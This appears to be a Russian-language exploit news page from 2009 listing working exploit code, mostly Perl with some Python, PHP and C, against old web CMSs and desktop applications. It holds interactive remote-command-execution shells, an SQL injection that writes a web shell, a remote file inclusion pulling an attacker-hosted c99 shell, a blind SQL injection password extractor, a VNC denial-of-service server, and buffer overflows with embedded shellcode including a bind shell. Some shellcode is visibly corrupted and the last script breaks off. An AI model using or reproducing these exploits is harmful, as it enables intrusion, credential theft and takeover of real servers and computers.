Цель: q-news 2.0
Воздействие: Выполнение произвольных команд

Код эксплоита:

##########################################################################

Author = FireShot , Jacopo Vuga.
Mail = fireshotautisticiorg

Vulnerability = Remote Command Execution
Software = q-news 2.0
Download =
http://ovh.dl.sourceforge.net/sourceforge/php-box/2.0_nologin.zip

Greets to = Osirys for his friendship and his tips, Myral, str0ke

###########################################################################

[EXPLOIT]

#!/usr/bin/perl

use HTTP::Request;
use LWP::UserAgent;

my $host = $ARGV[0];
my $vuln = "/wsettings.php?speed=";
my $rce = "/settings.php?cmd=";
my $evil = "';system(\$_GET[cmd]);\$x = '";

my $inj_url = $host.$vuln.$evil;
my $rce_url = $host.$rce;

($host) || die " usage= perl $0 site \n";

print "------------------------\n";
print " Q-News RCE Exploit \n";
print " by FireShot \n";
print "------------------------\n\n";

$response = get($inj_url);
if ($response =~ /Successfully saved settings/) {
&shell;
}
else {
print "error \n";
exit(0);
}

sub shell {
print "FireShot-shell: ";
my $cmd = ;
$cmd !~ /quit/ || die " exit \n";
my $url = $rce_url.$cmd;
my $re = get($url);
if ($re =~ /(.)/) {
print $re;
}
else {
print "command unknow \n";
}
&shell;
}

sub get() {
my $url = $_[0];
my $req = HTTP::Request->new(GET => $url);
my $agent = LWP::UserAgent->new();
$agent->timeout(4);
my $response = $agent->request($req);
return $response->content;
}

[/EXPLOIT]

############################################################################

Управление Hyper-V
Автоматизация отклика, постоянное наблюдение, интерфейс консоли ММС

Код эксплоита:

#!/usr/bin/perl

# |----------------------------------------------------------------------------------------------------------------------------------|
# | INFORMATIONS |
# |----------------------------------------------------------------------------------------------------------------------------------|
# |Web Application : Hedgedog-CMS 1.21 |
# |Download : http://mesh.dl.sourceforge.net/sourcef.....21.zip |
# |----------------------------------------------------------------------------------------------------------------------------------|
# |Remote Command Execution Exploit |
# |by Osirys |
# |osirys[at]autistici[dot]org |
# |osirys.org |
# |Thx&Greets to: evilsocket, athum |
# |----------------------------------------------------------------------------------------------------------------------------------|
# |BUG [Local File Inclusion]
# | p0c : /[path]/includes/footer.php?c_temp_path=[lf]%00
# | In source $c_temp_path is not declared, so if register_globals = On we can set its value from GET directly.
# |----------------------------------------------------------------------------------------------------------------------------------|
# |BUG [Abitrary php code writing]
# | This cms is not coded too good, we can bypass admin login just doing it via socket or lwp with $_POST[l_mode].
# | From admin panel everything before beeing passed in a file is filtered with htmlspecialchars and other fucntions,
# | expect of the email contact variable, that's the hell bug.
# | The sploit before overwriting a previous configuration, tries to get the old one, then it executes your commands.
# |----------------------------------------------------------------------------------------------------------------------------------|

# ------------------------------------------------------------------
# Exploit in action [>!]
# ------------------------------------------------------------------
# osirys[~]>$ perl lolzo.txt http://localhost/hedgehog-cms/
#
# --------------------------------
# Hedgedog-CMS RCE Exploit
# by Osirys
# --------------------------------
#
#

12 февраля, 2009

Цель: TightVNC
Воздействие: Отказ в обслуживании

Код эксплоита:

#!/usr/bin/env python

#digital.desi@in.com

# Modified Andres Lopez Luksenberg's exploit for Authentication Failure scenario in TightVNC. BID 33569 CVE-2009-0388

import socket

serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('', 5900))
serversocket.listen(1)

while True:
clientsocket, clientaddres = serversocket.accept()

data = 'RFB 003.008\n'
clientsocket.sendall(data)

data_cli = clientsocket.recv(1024)
print data_cli

data = '\x02\x02\x10'
clientsocket.sendall(data)

data_cli = clientsocket.recv(1024)

data = '\x00'*4
clientsocket.sendall(data)

data = ('\x00'*3)+'\x01'
clientsocket.sendall(data)

data = ('\x00'*3)+'\x02STDVVNCAUTH_'
clientsocket.sendall(data)

data_cli = clientsocket.recv(1024)

data = ('\x01'*16)
clientsocket.sendall(data)

data_cli = clientsocket.recv(1024)

data = '\x00\x00\x00\x01'
clientsocket.sendall(data)

data = '\xf0\xff\xff\xff'
clientsocket.sendall(data)

data = 'A'*10000
clientsocket.sendall(data)

clientsocket.close()
serversocket.close()

Управление Hyper-V
Автоматизация отклика, постоянное наблюдение, интерфейс консоли ММС

12 февраля, 2009

Цель: FeedDemon 2.7 и более ранние версии
Воздействие: Выполнение произвольного кода

Описание уязвимости:

* Переполнение буфера в FeedDemon

Код эксплоита:

#!/usr/local/bin/perl
#-----------------------------------------------------------------------------
# FeedDemon version 2.7.0.0 Buffer overFlow
# Reference:
# http://security.bkis.vn/?p=329
# http://www.securityfocus.com/bid/33630/info
# http://secunia.com/advisories/33718/
# Tested in Windows XP Sp2 (English)
# Created by cenjan (xcenjanx@yahoo.com)
# Description: + This code generates a opml file (feeddemonexploit.opml)
# + Import that file by the Import Feed function of Feed Demon
# + The calc.exe will execute
#-----------------------------------------------------------------------------
my $head=' # Shellcode by Metasploit
my $devil=
"\x31\xC9\x83\xE9\xDE\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xEC".
"\x2D\x36\x5E\x83\xEB\xFC\xE2\xF4\x10\xC5\x72\x5E\xEC\x2D\xBD" .
"\x1B\xD0\xA6\x4A\x5B\x94\x2C\xD9\xD5\xA3\x35\xBD\x1\xCC\x2C".
"\xDD\x17\x67\x19\xBD\x5F\x2\x1C\xF6\xC7\x40\xA9\xF6\x2A\xEB".
"\xEC\xFC \x53\xED\xEF\xDD\xAA\xD7\x79\x12\x5A\x99\xC8\xBD\x1".
"\xC8\x2C\xDD\x38\x67\x21\x7D\xD5\xB3\x31\x37\xB5\x67\x31\xBD".
"\x5F\x7\xA4\x6A\x7A \xE8\xEE\x7\x9E\x88\xA6\x76\x6E\x69\xED".
"\x4E\x52\x67\x6D\x3A\xD5\x9C\x31\x9B\xD5\x84\x25\xDD\x57\x67".
"\xAD\x86\x5E\xEC\x2D\xBD\x36\xD 0\x72\x7\xA8\x8C\x7B\xBF\xA6".
"\x6F\xED\x4D\xE\x84\xDD\xBC\x5A\xB3\x45\xAE\xA0\x66\x23\x61".
"\xA1\xB\x4E\x57\x32\x8F\x2D\x36\x5E\x90\x90 \x90\x90\x90\x90".
"\x90\x90\xED\x1E\x94\x7C\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x90\x90\x90\x90\x90\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\x FE\xCD".
"\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";

my $tail='">';
open (f,'>feeddemonexploit.opml');
print f "\xff\xfe";
close(f);

open (f,'>>:encoding(ucs-2le)','feeddemonexploit.opml');
print f $head;
close(f);

open (f,'>>feeddemonexploit.opml');
print f $overflow;
print f $devil;
close(f);

open (f,'>>:encoding(ucs-2le)','feeddemonexploit.opml');
print f $tail;
close (f);
print "Create exploit file successfully!";

12 февраля, 2009

Цель: PHP Director 0.21 и более ранние версии
Воздействие: Выполнение произвольных команд

Код эксплоита:

--+++===================================================================+++--
--+++====== PHP Director <= 0.21 Remote Command Execution Exploit ======+++--
--+++===================================================================+++--

#!/usr/bin/perl

use strict;
use warnings;
use IO::Socket;

sub clear
{
my $out = $_ [0];
$out =~ s/.+?xx//;
$out =~ s/xx.+//;
return $out;
}

sub usage
{
print "\nPHP Director <= 0.21 Remote Command Execution Exploit".
"\n[+] Author: darkjoker".
"\n[+] Site : http://darkjoker.net23.net ".
"\n[+] Download: http://downloads.sourceforge.net/phpdire....irror=0 ".
"\n[+] Usage : perl ${0} ".
"\n[+] Ex. : perl ${0} localhost /PHPDirector /opt/lampp/htdocs/PHPDirector".
"\n[+] Notes : must be the same directory where CMS is hosted".
"\n\n";
exit ();
}

sub send_shell
{
my ($host, $path, $disc_path) = @_;
my $sock = new IO::Socket::INET (
PeerHost => $host,
PeerPort => 80,
Proto => "tcp",
) or die "[-] Exploit failed.\n";
my $sql_code = "searching=x' UNION SELECT 1,'xx "?>xx', 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 INTO ".
"OUTFILE '${disc_path}/shell.php' FROM pp_files#";
my $post = "POST ${path}/index.php HTTP/1.1\r\n".
"Host: ${host}\r\n".
"Connection: Close\r\n".
"Content-Length: ". length ($sql_code) . "\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n\r\n".
$sql_code;
print $sock $post;
close ($sock);
}

my ($host, $path, $disc_path) = @ARGV;
usage unless ($disc_path);
$disc_path = "../"x10 . $disc_path;
send_shell ($host, $path, $disc_path);
print "Delete this shell after use.\n'quit' command to exit\n\n";
my $cmd;
while (1)
{
print "backdoor\@${host}: \$ ";
$cmd = ;
chomp $cmd;
$cmd =~ s/ /%20/g;
exit if ($cmd =~ /quit/);
my $sock = new IO::Socket::INET (
PeerHost => $host,
PeerPort => 80,
Proto => "tcp",
);
my $get = "GET ${path}/shell.php?cmd=${cmd}\r\n\r\n";
print $sock $get;
my $x;
$x .= $_ while (<$sock>);
$x = clear ($x);
print $x;
close ($sock);
}

12 февраля, 2009

Цель: IF-CMS 2.0 и более ранние версии
Воздействие: SQL-инъекция

Код эксплоита:

--+++=======================================================+++--
--+++====== IF-CMS <= 2.0 Blind SQL Injection Exploit ======+++--
--+++=======================================================+++--

function query ($username, $char, $pos)
{
//Increase benchmark when exploit prints uncorrect passwords

$query = "x' OR IF ((ASCII(SUBSTRING((SELECT pass FROM rns_admin WHERE ".
"nick = '{$username}'),{$pos},1))={$char}), BENCHMARK(100000000,CHAR(0)),0) OR '1' = '2";
$query = str_replace (" ", "%20", $query);
$query = str_replace ("'", "%27", $query);
return $query;
}

function exploit ($hostname, $path, $username, $char, $pos)
{
$char = ord ($char);
$fp = fsockopen ($hostname, 80);
$get = "GET {$path}/frame.php?id=". query ($username, $char, $pos) . " HTTP/1.1\r\n".
"Host: {$hostname}\r\n".
"Connection: Close\r\n\r\n";
$a = time ();
fputs ($fp, $get);
while (!feof ($fp))
fgets ($fp, 1024);

fclose ($fp);
$a = time () - $a;
if ($a > 4)
return true;
else
return false;

}

function usage ()
{
echo "\nIF-CMS <= 2.0 Blind SQL Injection Exploit".
"\n[+] Author : darkjoker".
"\n[+] Site : http://darkjoker.net23.net ".
"\n[+] Download: http://downloads.sourceforge.net/if-cms....irror=0 ".
"\n[+] Usage : php xpl.php ".
"\n[+] Ex. : php xpl.php localhost /IF-CMS root".
"\n\n";
exit ();
}

if ($argc != 4)
usage ();
$hostname = $argv [1];
$path = $argv [2];
$user = $argv [3];
//Edit this keylist when returned password is incomplete and add other characters you want
$key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
$chr = 0;
$pos = 1;
echo "[+] Password: ";
while ($chr < strlen ($key))
{
if (exploit ($hostname, $path, $user, $key [$chr], $pos))
{
echo $key [$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo "\n\n";
?>

12 февраля, 2009

Цель: 1024 CMS 1.4.4 и более ранние версии
Воздействие: Выполнение произвольных команд

Описание уязвимости:

* Множественные уязвимости в 1024 CMS

Код эксплоита:

#!/usr/bin/perl
####################################################################
# 1024 CMS <= 1.4.4 Remote Command Execution with RFI (c99) Exploit
# download: http://www.trebledesigns.com/1024cms.zip
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://www.hack0wn.com/
# team: Spanish Hackers Team - [SHT]
#
# Hack0wn Security Project!!
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
####################################################################
#
# "need" allow_url_include = On && register_globals = On
#
# RFI vuln!: [/themes/default/layouts/standard.php]
# # if($page_ck['custom'] == 'N' || isset($page_include)) {
# if(!isset($page_include)) include("./pages/".$page."/default/content.php");
# else include($page_include);
# } else {
# ...
#
####################################################################
# OUTPUT: (tested on localhost)
#
# [shell]:~$ id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
# [shell]:~$ uname -a
# Linux h4x0rz 2.6.18-6-686 #1 SMP Fri Dec 12 16:48:28 UTC 2008 i686 GNU/Linux
# [shell]:~$ exit
# h4x0rz:/home/joss/Desktop#

use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
use Getopt::Long;

sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
}

&clear();

sub banner {
&clear();
print "[x] 1024 CMS <= 1.4.4 Remote Command Execution with RFI (c99) Exploit\n";
print "[x] Written By JosS\n";
print "[x] sys-project[at]hotmail[dot]com\n\n";
print "[+] Usage:\n";
print "[+] $0 -vuln \"web+path\" -shell \"shell\"\n";
print "[+] eX: $0 -vuln \"http://www.hack0wn.com/test/\" -shell \"http://hack0wn.com/c99.txt?\"\n\n";
exit();
}

my $options = GetOptions (
'help!' => \$help,
'vuln=s' => \$vuln,
'shell=s' => \$shell
);

&banner unless ($vuln);
&banner unless ($shell);

&banner if $banner eq 1;

chomp($vuln);
chomp($shell);

while (){

print "[shell]:~\$ ";
chomp($cmd=);

if ($cmd eq "exit" || $cmd eq "quit") {
exit 0;
}

my $ua = LWP::UserAgent->new;
$iny="?&act=cmd&cmd=" . $cmd . "&d=/&submit=1&cmd_txt=1";
chomp($iny);
my $own = $vuln . "/themes/default/layouts/standard.php?page_include=" . $shell . $iny;
chomp($own);
my $req = HTTP::Request->new(GET => $own);
my $res = $ua->request($req);
my $con = $res->content;
if ($res->is_success){
print $1,"\n" if ( $con =~ m/readonly> (.*?)\<\/textarea>/mosix);
}
else
{
print "[p0c] Exploit failed\n";
exit(1);
}
}

# __h0__

10 февраля, 2009

Цель: Simple PHP News 1.0
Воздействие: Выполнение произвольных команд

Код эксплоита:

* Simple PHP News-expl.pl

#!/usr/bin/perl

# -----------------------------------------------------------------------------
# INFORMATIONS
# -----------------------------------------------------------------------------

# App => Simple PHP News 1.0 Final
# Downl => http://www.hotscripts.com/jump.php?listing_id=66376&jump_type=1

# Remote Command Execution Exploit
# by Osirys
# osirys[at]autistici[dot]org
# osirys.org
# Thx&Greets to: evilsocket

# A personal comment : just bleah !!

# Tested with: Magic Quotes => Off

# ------------------------------------------------------------------
# Exploit in action [>!]
# ------------------------------------------------------------------
# osirys[~]>$ perl rce_lol.txt http://localhost/php_simple_news/

# ---------------------------------
# Simple PHP News RCE Exploit
# by Osirys
# ---------------------------------

#

10 февраля, 2009

Цель: dBpowerAMP Audio Player 2
Воздействие: Выполнение произвольного кода

Описание уязвимости:

* Удаленное выполнение произвольного кода в dBpowerAMP Audio Player

Код эксплоита:

* dBpowerAMP-expl.c

/*
* simo36.c
* CODED By SimO-s0fT (Morrocco-->marrakesh city)
* Home : Exploiter-ma.com
* e-mail: maroc-anti-connexion[at]hotmail.com[dot]com
*greetz : Stack & Djekmani4ever & alphanix & all friends
* dBpowerAMP Audio Player local buffer overflow exploit
*
* this feat was exploit windows trus sp2
* there is a small problem on the farm but fortunately I managed to use it
* and remember that this feat has been operating as trus win
* I test and winxp sp1 I found another problem
* example:
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
&&&&& G:\Documents and Settings\SimO\Bureau>simo simo36.pls &&&&&
&&&&& ################################################################ &&&&&
&&&&& dBpowerAMP Audio Player local buffer overflow exploit &&&&&
&&&&& Coded By SimO-s0fT &&&&&
&&&&& e-mail : simo[at]exploiter-ma[dot]com &&&&&
&&&&& ################################################################ &&&&&
&&&&& USAGE : simo36.exe simo.pls &&&&&
&&&&& [1] execute calc.exe &&&&&
&&&&& [2] execute bindshell LPORT=7777 &&&&&
&&&&& ################################################################ &&&&&
&&&&& enter 2 &&&&&
&&&&& created !! &&&&&
&&&&& openit with dBpowerAMP &&&&&
&&&&& &&&&&
&&&&& G:\Documents and Settings\SimO>telnet 127.0.0.1 7777 &&&&&
&&&&& Microsoft Windows XP [version 5.1.2600] &&&&&
&&&&& Microso© Copyright 1985-2001 Microsoft Corp. &&&&&
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
*/
#include
#include
#include
#include
#define OFFSET 257
char header[]=
"\x5b\x70\x6c\x61\x79\x6c\x69\x73\x74\x5d\x0d\x0d\x4e\x75\x6d\x62"
"\x65\x72\x4f\x66\x45\x6e\x74\x72\x69\x65\x73\x3d\x31\x0d\x0d\x46"
"\x69\x6c\x65\x31\x3d\x68\x74\x74\x70\x3a\x2f\x2f";
// calc
char scode1[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x46\x43\x36\x42\x50\x5a\x2f";
// bind shell 7777
char scode2[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61"
"\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x71\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x6d\x39\x4b\x4c\x32"
"\x4a\x5a\x4b\x50\x4d\x6d\x38\x6b\x49\x49\x6f\x59\x6f\x39\x6f\x35"
"\x30\x6c\x4b\x70\x6c\x65\x74\x37\x54\x4c\x4b\x42\x65\x47\x4c\x6e"
"\x6b\x31\x6c\x46\x65\x33\x48\x43\x31\x48\x6f\x6c\x4b\x70\x4f\x65"
"\x48\x6c\x4b\x73\x6f\x35\x70\x37\x71\x38\x6b\x31\x59\x4c\x4b\x46"
"\x54\x6e\x6b\x53\x31\x58\x6e\x30\x31\x6f\x30\x4f\x69\x4e\x4c\x4b"
"\x34\x49\x50\x41\x64\x46\x67\x49\x51\x7a\x6a\x46\x6d\x43\x31\x48"
"\x42\x5a\x4b\x38\x74\x47\x4b\x30\x54\x64\x64\x51\x38\x42\x55\x4b"
"\x55\x4e\x6b\x53\x6f\x51\x34\x43\x31\x4a\x4b\x50\x66\x4e\x6b\x46"
"\x6c\x42\x6b\x4c\x4b\x73\x6f\x75\x4c\x33\x31\x5a\x4b\x65\x53\x34"
"\x6c\x6e\x6b\x6d\x59\x30\x6c\x57\x54\x55\x4c\x55\x31\x4b\x73\x74"
"\x71\x69\x4b\x65\x34\x6e\x6b\x43\x73\x74\x70\x6c\x4b\x67\x30\x46"
"\x6c\x6c\x4b\x70\x70\x67\x6c\x6e\x4d\x6c\x4b\x57\x30\x44\x48\x71"
"\x4e\x72\x48\x4e\x6e\x50\x4e\x54\x4e\x38\x6c\x70\x50\x4b\x4f\x4e"
"\x36\x71\x76\x41\x43\x31\x76\x31\x78\x76\x53\x30\x32\x53\x58\x30"
"\x77\x44\x33\x57\x42\x63\x6f\x70\x54\x6b\x4f\x48\x50\x73\x58\x58"
"\x4b\x58\x6d\x6b\x4c\x57\x4b\x70\x50\x6b\x4f\x6a\x76\x71\x4f\x6d"
"\x59\x4b\x55\x65\x36\x6c\x41\x68\x6d\x53\x38\x63\x32\x42\x75\x51"
"\x7a\x36\x62\x59\x6f\x58\x50\x71\x78\x4a\x79\x34\x49\x4b\x45\x6e"
"\x4d\x30\x57\x69\x6f\x4e\x36\x52\x73\x41\x43\x62\x73\x76\x33\x51"
"\x43\x70\x43\x43\x63\x73\x73\x36\x33\x6b\x4f\x4a\x70\x75\x36\x41"
"\x78\x75\x4e\x71\x71\x35\x36\x42\x73\x4b\x39\x79\x71\x6c\x55\x70"
"\x68\x4f\x54\x75\x4a\x32\x50\x39\x57\x52\x77\x69\x6f\x38\x56\x70"
"\x6a\x72\x30\x50\x51\x53\x65\x4b\x4f\x58\x50\x55\x38\x6c\x64\x4c"
"\x6d\x34\x6e\x49\x79\x66\x37\x6b\x4f\x4e\x36\x50\x53\x30\x55\x69"
"\x6f\x4a\x70\x53\x58\x7a\x45\x41\x59\x4e\x66\x37\x39\x36\x37\x69"
"\x6f\x59\x46\x72\x70\x50\x54\x31\x44\x33\x65\x4b\x4f\x5a\x70\x4f"
"\x63\x51\x78\x38\x67\x50\x79\x38\x46\x43\x49\x32\x77\x4b\x4f\x4b"
"\x66\x62\x75\x79\x6f\x6a\x70\x45\x36\x30\x6a\x52\x44\x30\x66\x41"
"\x78\x32\x43\x72\x4d\x6f\x79\x6d\x35\x62\x4a\x42\x70\x70\x59\x74"
"\x69\x5a\x6c\x6c\x49\x6b\x57\x41\x7a\x32\x64\x6b\x39\x68\x62\x30"
"\x31\x6f\x30\x6b\x43\x6e\x4a\x6b\x4e\x51\x52\x34\x6d\x49\x6e\x62"
"\x62\x36\x4c\x5a\x33\x6c\x4d\x71\x6a\x65\x68\x6e\x4b\x4c\x6b\x4e"
"\x4b\x55\x38\x30\x72\x59\x6e\x4c\x73\x37\x66\x4b\x4f\x30\x75\x63"
"\x74\x39\x6f\x6e\x36\x33\x6b\x36\x37\x72\x72\x31\x41\x31\x41\x46"
"\x31\x50\x6a\x55\x51\x31\x41\x41\x41\x32\x75\x42\x71\x39\x6f\x48"
"\x50\x50\x68\x6c\x6d\x39\x49\x45\x55\x78\x4e\x30\x53\x39\x6f\x6b"
"\x66\x62\x4a\x79\x6f\x39\x6f\x47\x47\x39\x6f\x58\x50\x4e\x6b\x50"
"\x57\x4b\x4c\x6c\x43\x4b\x74\x70\x64\x6b\x4f\x6a\x76\x41\x42\x49"
"\x6f\x58\x50\x30\x68\x68\x6f\x6a\x6e\x4b\x50\x31\x70\x42\x73\x49"
"\x6f\x58\x56\x49\x6f\x78\x50\x61";
int main(int argc,char *argv[]){
FILE *openfile;
unsigned char *buffer;
unsigned int RET=0x7c85d568;
unsigned int offset=0;
int number=0;

printf("################################################################\n");
printf(" dBpowerAMP Audio Player local buffer overflow exploit\n");
printf("\tCoded By SimO-s0fT\n");
printf("e-mail : simo[at]exploiter-ma[dot]com\n");
printf("################################################################\n");
printf("USAGE : simo36.exe simo.pls\n");
printf("[1] execute calc.exe\n");
printf("[2] execute bindshell LPORT=7777\n");
printf("################################################################\n");
system("color 04");
sleep(2000);
printf("enter");
scanf("%d",&number);
if((openfile=fopen(argv[1],"wb"))==NULL){
perror("cannot opening file xD");
exit(0);
}
switch(number){
case 1:
buffer = (unsigned char *) malloc (OFFSET + sizeof(RET) + strlen(scode1));
memset(buffer,0x90,OFFSET + sizeof(RET) + strlen(scode1));
offset=OFFSET;
memcpy(buffer+offset,&RET,sizeof(RET)-1);
offset+=sizeof(RET);
memcpy(buffer+offset,scode1,strlen(scode1));
offset+=strlen(scode1);
fputs(header,openfile);
fputs(buffer,openfile);
fclose(openfile);
printf("created !!\nopenit with dBpowerAMP");
break;

case 2:
buffer = (unsigned char *) malloc ( OFFSET + sizeof(RET) + strlen(scode2));
memset(buffer,0x90, OFFSET + sizeof(RET) + strlen(scode2));
offset=OFFSET;
memcpy(buffer+offset,&RET,sizeof(RET));
offset+=sizeof(RET);
memcpy(buffer+offset,scode2,strlen(scode2));
offset+=strlen(scode2);
fputs(header,openfile);
fputs(buffer,openfile);
fclose(openfile);
printf("created !!\n openit with dBpowerAMP");
break;
}
free(buffer);
return 0;
}

04 февраля, 2009

Цель: Free Download Manager 3.0 Build 844 и более ранние версии
Воздействие: Выполнение произвольного кода

Описание уязвимости:

* Множественные уязвимости в Free Download Manager

Код эксплоита:

* Free-Download-Manager-expl.pl

#!/usr/bin/perl
#
# Free Download Manager <= 3.0 Build 844 .torrent BOF Exploit
# -----------------------------------------------------------
# Exploit by SkD (skdrat@hotmail.com)
#
# Vendors URL =
# [www.freedownloadmanager.org]
# Download FDM 3.0 Build 844 =
# [http://www.download.com/Free-Download-Manager/3000-2071_4-10301621.html]
# (Downloaded by over 1.6 million users!)
#
# This is another one of the more advanced exploitation methods
# for buffer overflows using my method called "shell building".
# It utilizes a SEH overflow and then a shellcode builder/assembler
# "builds"/or "assembles" bytes that were deleted by transformation
# of the buffer so that the shellcode will work without a flaw.
# I have been able to do this because of my recent experiences with
# UNICODE based overflows (heap & stack). This is a demonstration
# of how you can obtain power with limitations to buffer.
# Of course I could have used my shellhunting technique,
# but this is a new method, and to demonstrate it in a world of
# dying buffer overflows is important for me.
#
# Unfortunately I did not have time to make this a universal exploit
# so it will only work on all NT systems EXCEPT Vista (due to randomized
# heap, etc). But with a few modifications it can work (sure of it).
# Read my notes & comments in the script for more info.
#
# Tested on Windows XP SP3 (Fully Patched) & Windows 2000 SP4.
#
# Note: Author has no responsibility over the damage you do with this!

use strict;
use warnings;

my $tdata1 = "\x64\x38\x3A\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x31\x32\x3A\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x37\x3A\x63\x6F\x6D".
"\x6D\x65\x6E\x74\x31\x32\x3A\x63\x6F\x6D\x6D\x65\x6E\x74\x74\x74\x74\x74\x74\x31\x33\x3A\x63\x72\x65\x61\x74\x69\x6F\x6E\x20".
"\x64\x61\x74\x65\x69\x31\x32\x33\x33\x36\x31\x36\x35\x30\x37\x65\x34\x3A\x69\x6E\x66\x6F\x64\x36\x3A\x6C\x65\x6E\x67\x74\x68".
"\x69\x39\x31\x37\x33\x34\x65\x34\x3A\x6E\x61\x6D\x65\x31\x32\x39\x39\x39\x3A";
my $tdata2 = "\x31\x32\x3A\x70\x69\x65\x63\x65\x20\x6C\x65\x6E\x67\x74\x68\x69\x32\x36\x32\x31\x34\x34\x65\x36\x3A\x70\x69\x65\x63\x65\x73".
"\x32\x30\x3A\x10\x7F\xD5\x50\xE2\x70\xA5\x80\x61\x42\x7B\x53\x08\xE0\xCE\xFE\x9C\xDA\x2E\xE1\x65\x65";

# win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\x01\xeb\x03\x59\x01\xeb\x05\x01\xe8\x01\xf8\x01\xff\x01\xff\x01\xff\x4f\x49\x49\x49\x49\x49".
#Notice I added 0x01 byte before each 0x80=> byte.
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x3 4".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" .
"\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x44\x4e\x43\x4b\x38\x4e\x47".
"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x51\x4b\x38".
" \x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x48".
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c".
"\x 46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x57\x45\x4e\x4b\x48".
"\x4f \x35\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
"\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58".
"\x41\x 30\x4b\x4e\x49\x48\x4e\x55\x46\x52\x46\x50\x43\x4c\x41\x33".
"\x42\x4c\x46\x36\x4b\x48\x42\x34\x42\x53\x45\x58\x42\x4c\x4a\x37".
"\x4e\x50 \x4b\x58\x42\x34\x4e\x30\x4b\x58\x42\x57\x4e\x31\x4d\x4a".
"\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
